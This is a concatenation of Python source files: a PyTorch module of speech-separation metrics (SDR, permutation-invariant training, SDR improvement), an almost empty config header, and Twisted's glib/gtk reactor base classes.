# LICENSE file in the root directory of this source tree.
#!/usr/bin/env python3
# pyre-strict
import math
from itertools import permutations
from typing import Callable, Optional
import torch
def sdr(
estimate: torch.Tensor,
reference: torch.Tensor,
mask: Optional[torch.Tensor] = None,
epsilon: float = 1e-8,
) -> torch.Tensor:
"""Computes source-to-distortion ratio.
    1. scale the reference signal with power(s_est * s_ref) / power(s_ref * s_ref)
2. compute SNR between adjusted estimate and reference.
Args:
        estimate (torch.Tensor): Estimated signal.
Shape: [batch, speakers (can be 1), time frame]
reference (torch.Tensor): Reference signal.
Shape: [batch, speakers, time frame]
mask (torch.Tensor or None, optional): Binary mask to indicate padded value (0) or valid value (1).
Shape: [batch, 1, time frame]
epsilon (float, optional): constant value used to stabilize division.
Returns:
torch.Tensor: scale-invariant source-to-distortion ratio.
Shape: [batch, speaker]
References:
- Single-channel multi-speaker separation using deep clustering
<NAME>, <NAME>, <NAME>, <NAME>, and <NAME>,
- Conv-TasNet: Surpassing Ideal Time--Frequency Magnitude Masking for Speech Separation
Luo, Yi and Mesgarani, Nima
https://arxiv.org/abs/1809.07454
Notes:
This function is tested to produce the exact same result as
https://github.com/naplab/Conv-TasNet/blob/e66d82a8f956a69749ec8a4ae382217faa097c5c/utility/sdr.py#L34-L56
"""
reference_pow = reference.pow(2).mean(dim=2, keepdim=True)
mix_pow = (estimate * reference).mean(dim=2, keepdim=True)
scale = mix_pow / (reference_pow + epsilon)
reference = scale * reference
error = estimate - reference
reference_pow = reference.pow(2)
error_pow = error.pow(2)
if mask is None:
reference_pow = reference_pow.mean(dim=2)
error_pow = error_pow.mean(dim=2)
else:
denom = mask.sum(dim=2)
reference_pow = (mask * reference_pow).sum(dim=2) / denom
error_pow = (mask * error_pow).sum(dim=2) / denom
return 10 * torch.log10(reference_pow) - 10 * torch.log10(error_pow)
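# Shape note added for clarity (illustrative, not part of the original module):
# with `estimate` and `reference` of shape [batch, speakers, time frame], e.g.
#
#     est = torch.rand(4, 2, 16000)
#     ref = torch.rand(4, 2, 16000)
#     sdr(est, ref).shape  # -> torch.Size([4, 2]), one value per (batch, speaker)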
class PIT(torch.nn.Module):
"""Applies utterance-level speaker permutation
    Computes the maximum possible value of the given utility function
over the permutations of the speakers.
Args:
utility_func (function):
Function that computes the utility (opposite of loss) with signature of
            (estimate: torch.Tensor, reference: torch.Tensor) -> torch.Tensor
where input Tensors are shape of [batch, speakers, frame] and
the output Tensor is shape of [batch, speakers].
References:
- Multi-talker Speech Separation with Utterance-level Permutation Invariant Training of
Deep Recurrent Neural Networks
<NAME>, <NAME>, <NAME> and <NAME>
https://arxiv.org/abs/1703.06284
"""
def __init__(self, utility_func: Callable[..., torch.Tensor]) -> None:
super().__init__()
self.utility_func = utility_func
def forward(
self,
estimate: torch.Tensor,
reference: torch.Tensor,
mask: Optional[torch.Tensor] = None,
epsilon: float = 1e-8,
) -> torch.Tensor:
"""Compute utterance-level PIT Loss
Args:
estimate (torch.Tensor): Estimated source signals.
                Shape: [batch, speakers, time frame]
reference (torch.Tensor): Reference (original) source signals.
Shape: [batch, speakers, time frame]
mask (torch.Tensor or None, optional): Binary mask to indicate padded value (0) or valid value (1).
Shape: [batch, 1, time frame]
epsilon (float, optional): constant value used to stabilize division.
Returns:
            torch.Tensor: Maximum of the criterion over all speaker permutations.
Shape: [batch, ]
"""
assert estimate.shape == reference.shape
batch_size, num_speakers = reference.shape[:2]
num_permute = math.factorial(num_speakers)
util_mat = torch.zeros(
batch_size, num_permute, dtype=estimate.dtype, device=estimate.device
)
for i, idx in enumerate(permutations(range(num_speakers))):
util = self.utility_func(
estimate, reference[:, idx, :], mask=mask, epsilon=epsilon
)
util_mat[:, i] = util.mean(dim=1) # take the average over speaker dimension
return util_mat.max(dim=1).values
_sdr_pit = PIT(utility_func=sdr)
def sdr_pit(
estimate: torch.Tensor,
reference: torch.Tensor,
mask: Optional[torch.Tensor] = None,
epsilon: float = 1e-8,
) -> torch.Tensor:
"""Computes scale-invariant source-to-distortion ratio.
1. adjust both estimate and reference to have 0-mean
    2. scale the reference signal with power(s_est * s_ref) / power(s_ref * s_ref)
3. compute SNR between adjusted estimate and reference.
Args:
        estimate (torch.Tensor): Estimated signal.
Shape: [batch, speakers (can be 1), time frame]
reference (torch.Tensor): Reference signal.
Shape: [batch, speakers, time frame]
mask (torch.Tensor or None, optional): Binary mask to indicate padded value (0) or valid value (1).
Shape: [batch, 1, time frame]
epsilon (float, optional): constant value used to stabilize division.
Returns:
torch.Tensor: scale-invariant source-to-distortion ratio.
Shape: [batch, speaker]
References:
- Single-channel multi-speaker separation using deep clustering
<NAME>, <NAME>, <NAME>, <NAME>, and <NAME>,
- Conv-TasNet: Surpassing Ideal Time--Frequency Magnitude Masking for Speech Separation
Luo, Yi and Mesgarani, Nima
https://arxiv.org/abs/1809.07454
Notes:
This function is tested to produce the exact same result as the reference implementation,
*when the inputs have 0-mean*
https://github.com/naplab/Conv-TasNet/blob/e66d82a8f956a69749ec8a4ae382217faa097c5c/utility/sdr.py#L107-L153
"""
return _sdr_pit(estimate, reference, mask, epsilon)
def sdri(
estimate: torch.Tensor,
reference: torch.Tensor,
mix: torch.Tensor,
mask: Optional[torch.Tensor] = None,
epsilon: float = 1e-8,
) -> torch.Tensor:
"""Compute the improvement of SDR (SDRi).
    This function computes how much SDR is improved if the estimation is changed from
    the original mixture signal to the actual estimated source signals. That is,
    ``SDR(estimate, reference) - SDR(mix, reference)``.
    For computing ``SDR(estimate, reference)``, PIT (permutation invariant training) is applied,
    so that the best combination of sources between the reference signals and the estimate
    signals is picked.
Args:
estimate (torch.Tensor): Estimated source signals.
Shape: [batch, speakers, time frame]
reference (torch.Tensor): Reference (original) source signals.
Shape: [batch, speakers, time frame]
        mix (torch.Tensor): Mixed source signals, from which the estimated signals were generated.
Shape: [batch, speakers == 1, time frame]
mask (torch.Tensor or None, optional): Binary mask to indicate padded value (0) or valid value (1).
Shape: [batch, 1, time frame]
epsilon (float, optional): constant value used to stabilize division.
Returns:
torch.Tensor: Improved SDR. Shape: [batch, ]
References:
- Conv-TasNet: Surpassing Ideal Time--Frequency Magnitude Masking for Speech Separation
<NAME> and <NAME>
https://arxiv.org/abs/1809.07454
"""
sdr_ = sdr_pit(estimate, reference, mask=mask, epsilon=epsilon) # [batch, ]
base_sdr = sdr(mix, reference, mask=mask, epsilon=epsilon) # [batch, speaker]
return sdr_ - base_sdr.mean(dim=1)
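# Illustrative usage sketch added for clarity (an assumption, not shipped with
# this module): score random "estimates" against random references. The mixture
# here is a simple sum of the reference sources.
if __name__ == "__main__":
    batch, speakers, frames = 3, 2, 8000
    estimate = torch.rand(batch, speakers, frames)
    reference = torch.rand(batch, speakers, frames)
    mix = reference.sum(dim=1, keepdim=True)
    print(sdr_pit(estimate, reference).shape)    # -> torch.Size([3])
    print(sdri(estimate, reference, mix).shape)  # -> torch.Size([3])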
|
config/__init__.py | Neuralearn/PAN.pytorch | 419 | 12611071 | # -*- coding: utf-8 -*-
# @Time : 2019/8/23 21:50
# @Author : zhoujun |
src/twisted/internet/_glibbase.py | giadram/twisted | 4,612 | 12611080 | <reponame>giadram/twisted
# -*- test-case-name: twisted.internet.test -*-
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
This module provides base support for Twisted to interact with the glib/gtk
mainloops.
The classes in this module should not be used directly, but rather you should
import gireactor or gtk3reactor for GObject Introspection based applications,
or glib2reactor or gtk2reactor for applications using legacy static bindings.
"""
import sys
from zope.interface import implementer
from twisted.internet import base, posixbase, selectreactor
from twisted.internet.interfaces import IReactorFDSet
from twisted.python import log
def ensureNotImported(moduleNames, errorMessage, preventImports=[]):
"""
Check whether the given modules were imported, and if requested, ensure
they will not be importable in the future.
@param moduleNames: A list of module names we make sure aren't imported.
@type moduleNames: C{list} of C{str}
@param preventImports: A list of module name whose future imports should
be prevented.
@type preventImports: C{list} of C{str}
@param errorMessage: Message to use when raising an C{ImportError}.
@type errorMessage: C{str}
@raise ImportError: with given error message if a given module name
has already been imported.
"""
for name in moduleNames:
if sys.modules.get(name) is not None:
raise ImportError(errorMessage)
# Disable module imports to avoid potential problems.
for name in preventImports:
sys.modules[name] = None
class GlibWaker(posixbase._UnixWaker):
"""
Run scheduled events after waking up.
"""
def doRead(self):
posixbase._UnixWaker.doRead(self)
self.reactor._simulate()
@implementer(IReactorFDSet)
class GlibReactorBase(posixbase.PosixReactorBase, posixbase._PollLikeMixin):
"""
Base class for GObject event loop reactors.
Notification for I/O events (reads and writes on file descriptors) is done
by the gobject-based event loop. File descriptors are registered with
gobject with the appropriate flags for read/write/disconnect notification.
Time-based events, the results of C{callLater} and C{callFromThread}, are
handled differently. Rather than registering each event with gobject, a
single gobject timeout is registered for the earliest scheduled event, the
output of C{reactor.timeout()}. For example, if there are timeouts in 1, 2
and 3.4 seconds, a single timeout is registered for 1 second in the
future. When this timeout is hit, C{_simulate} is called, which calls the
appropriate Twisted-level handlers, and a new timeout is added to gobject
by the C{_reschedule} method.
To handle C{callFromThread} events, we use a custom waker that calls
C{_simulate} whenever it wakes up.
@ivar _sources: A dictionary mapping L{FileDescriptor} instances to
GSource handles.
@ivar _reads: A set of L{FileDescriptor} instances currently monitored for
reading.
@ivar _writes: A set of L{FileDescriptor} instances currently monitored for
writing.
@ivar _simtag: A GSource handle for the next L{simulate} call.
"""
# Install a waker that knows it needs to call C{_simulate} in order to run
# callbacks queued from a thread:
_wakerFactory = GlibWaker
def __init__(self, glib_module, gtk_module, useGtk=False):
self._simtag = None
self._reads = set()
self._writes = set()
self._sources = {}
self._glib = glib_module
self._gtk = gtk_module
posixbase.PosixReactorBase.__init__(self)
self._source_remove = self._glib.source_remove
self._timeout_add = self._glib.timeout_add
def _mainquit():
if self._gtk.main_level():
self._gtk.main_quit()
if useGtk:
self._pending = self._gtk.events_pending
self._iteration = self._gtk.main_iteration_do
self._crash = _mainquit
self._run = self._gtk.main
else:
self.context = self._glib.main_context_default()
self._pending = self.context.pending
self._iteration = self.context.iteration
self.loop = self._glib.MainLoop()
self._crash = lambda: self._glib.idle_add(self.loop.quit)
self._run = self.loop.run
def _handleSignals(self):
# First, install SIGINT and friends:
base._SignalReactorMixin._handleSignals(self)
# Next, since certain versions of gtk will clobber our signal handler,
# set all signal handlers again after the event loop has started to
# ensure they're *really* set. We don't call this twice so we don't
# leak file descriptors created in the SIGCHLD initialization:
self.callLater(0, posixbase.PosixReactorBase._handleSignals, self)
# The input_add function in pygtk1 checks for objects with a
# 'fileno' method and, if present, uses the result of that method
# as the input source. The pygtk2 input_add does not do this. The
# function below replicates the pygtk1 functionality.
# In addition, pygtk maps gtk.input_add to _gobject.io_add_watch, and
# g_io_add_watch() takes different condition bitfields than
# gtk_input_add(). We use g_io_add_watch() here in case pygtk fixes this
# bug.
def input_add(self, source, condition, callback):
if hasattr(source, "fileno"):
# handle python objects
def wrapper(ignored, condition):
return callback(source, condition)
fileno = source.fileno()
else:
fileno = source
wrapper = callback
return self._glib.io_add_watch(
fileno, condition, wrapper, priority=self._glib.PRIORITY_DEFAULT_IDLE
)
def _ioEventCallback(self, source, condition):
"""
Called by event loop when an I/O event occurs.
"""
log.callWithLogger(source, self._doReadOrWrite, source, source, condition)
return True # True = don't auto-remove the source
def _add(self, source, primary, other, primaryFlag, otherFlag):
"""
Add the given L{FileDescriptor} for monitoring either for reading or
writing. If the file is already monitored for the other operation, we
delete the previous registration and re-register it for both reading
and writing.
"""
if source in primary:
return
flags = primaryFlag
if source in other:
self._source_remove(self._sources[source])
flags |= otherFlag
self._sources[source] = self.input_add(source, flags, self._ioEventCallback)
primary.add(source)
def addReader(self, reader):
"""
Add a L{FileDescriptor} for monitoring of data available to read.
"""
self._add(reader, self._reads, self._writes, self.INFLAGS, self.OUTFLAGS)
def addWriter(self, writer):
"""
Add a L{FileDescriptor} for monitoring ability to write data.
"""
self._add(writer, self._writes, self._reads, self.OUTFLAGS, self.INFLAGS)
def getReaders(self):
"""
Retrieve the list of current L{FileDescriptor} monitored for reading.
"""
return list(self._reads)
def getWriters(self):
"""
Retrieve the list of current L{FileDescriptor} monitored for writing.
"""
return list(self._writes)
def removeAll(self):
"""
Remove monitoring for all registered L{FileDescriptor}s.
"""
return self._removeAll(self._reads, self._writes)
def _remove(self, source, primary, other, flags):
"""
Remove monitoring the given L{FileDescriptor} for either reading or
writing. If it's still monitored for the other operation, we
re-register the L{FileDescriptor} for only that operation.
"""
if source not in primary:
return
self._source_remove(self._sources[source])
primary.remove(source)
if source in other:
self._sources[source] = self.input_add(source, flags, self._ioEventCallback)
else:
self._sources.pop(source)
def removeReader(self, reader):
"""
Stop monitoring the given L{FileDescriptor} for reading.
"""
self._remove(reader, self._reads, self._writes, self.OUTFLAGS)
def removeWriter(self, writer):
"""
Stop monitoring the given L{FileDescriptor} for writing.
"""
self._remove(writer, self._writes, self._reads, self.INFLAGS)
def iterate(self, delay=0):
"""
One iteration of the event loop, for trial's use.
This is not used for actual reactor runs.
"""
self.runUntilCurrent()
while self._pending():
self._iteration(0)
def crash(self):
"""
Crash the reactor.
"""
posixbase.PosixReactorBase.crash(self)
self._crash()
def stop(self):
"""
Stop the reactor.
"""
posixbase.PosixReactorBase.stop(self)
# The base implementation only sets a flag, to ensure shutting down is
# not reentrant. Unfortunately, this flag is not meaningful to the
# gobject event loop. We therefore call wakeUp() to ensure the event
# loop will call back into Twisted once this iteration is done. This
# will result in self.runUntilCurrent() being called, where the stop
# flag will trigger the actual shutdown process, eventually calling
# crash() which will do the actual gobject event loop shutdown.
self.wakeUp()
def run(self, installSignalHandlers=True):
"""
Run the reactor.
"""
self.callWhenRunning(self._reschedule)
self.startRunning(installSignalHandlers=installSignalHandlers)
if self._started:
self._run()
def callLater(self, *args, **kwargs):
"""
Schedule a C{DelayedCall}.
"""
result = posixbase.PosixReactorBase.callLater(self, *args, **kwargs)
# Make sure we'll get woken up at correct time to handle this new
# scheduled call:
self._reschedule()
return result
def _reschedule(self):
"""
Schedule a glib timeout for C{_simulate}.
"""
if self._simtag is not None:
self._source_remove(self._simtag)
self._simtag = None
timeout = self.timeout()
if timeout is not None:
self._simtag = self._timeout_add(
int(timeout * 1000),
self._simulate,
priority=self._glib.PRIORITY_DEFAULT_IDLE,
)
def _simulate(self):
"""
Run timers, and then reschedule glib timeout for next scheduled event.
"""
self.runUntilCurrent()
self._reschedule()
class PortableGlibReactorBase(selectreactor.SelectReactor):
"""
Base class for GObject event loop reactors that works on Windows.
Sockets aren't supported by GObject's input_add on Win32.
"""
def __init__(self, glib_module, gtk_module, useGtk=False):
self._simtag = None
self._glib = glib_module
self._gtk = gtk_module
selectreactor.SelectReactor.__init__(self)
self._source_remove = self._glib.source_remove
self._timeout_add = self._glib.timeout_add
def _mainquit():
if self._gtk.main_level():
self._gtk.main_quit()
if useGtk:
self._crash = _mainquit
self._run = self._gtk.main
else:
self.loop = self._glib.MainLoop()
self._crash = lambda: self._glib.idle_add(self.loop.quit)
self._run = self.loop.run
def crash(self):
selectreactor.SelectReactor.crash(self)
self._crash()
def run(self, installSignalHandlers=True):
self.startRunning(installSignalHandlers=installSignalHandlers)
self._timeout_add(0, self.simulate)
if self._started:
self._run()
def simulate(self):
"""
Run simulation loops and reschedule callbacks.
"""
if self._simtag is not None:
self._source_remove(self._simtag)
self.iterate()
        # self.timeout() can return None when nothing is scheduled; guard that
        # case before clamping (min(None, 0.01) raises TypeError on Python 3).
        timeout = self.timeout()
        if timeout is None:
            timeout = 0.01
        else:
            timeout = min(timeout, 0.01)
self._simtag = self._timeout_add(
int(timeout * 1000),
self.simulate,
priority=self._glib.PRIORITY_DEFAULT_IDLE,
)
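# Illustrative usage note added for clarity (not part of this module): as the
# module docstring says, applications do not use these base classes directly.
# A typical GObject Introspection / GTK3 application installs a concrete
# reactor first, for example:
#
#     from twisted.internet import gtk3reactor
#     gtk3reactor.install()
#     from twisted.internet import reactor
#     reactor.callLater(5, reactor.stop)
#     reactor.run()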
|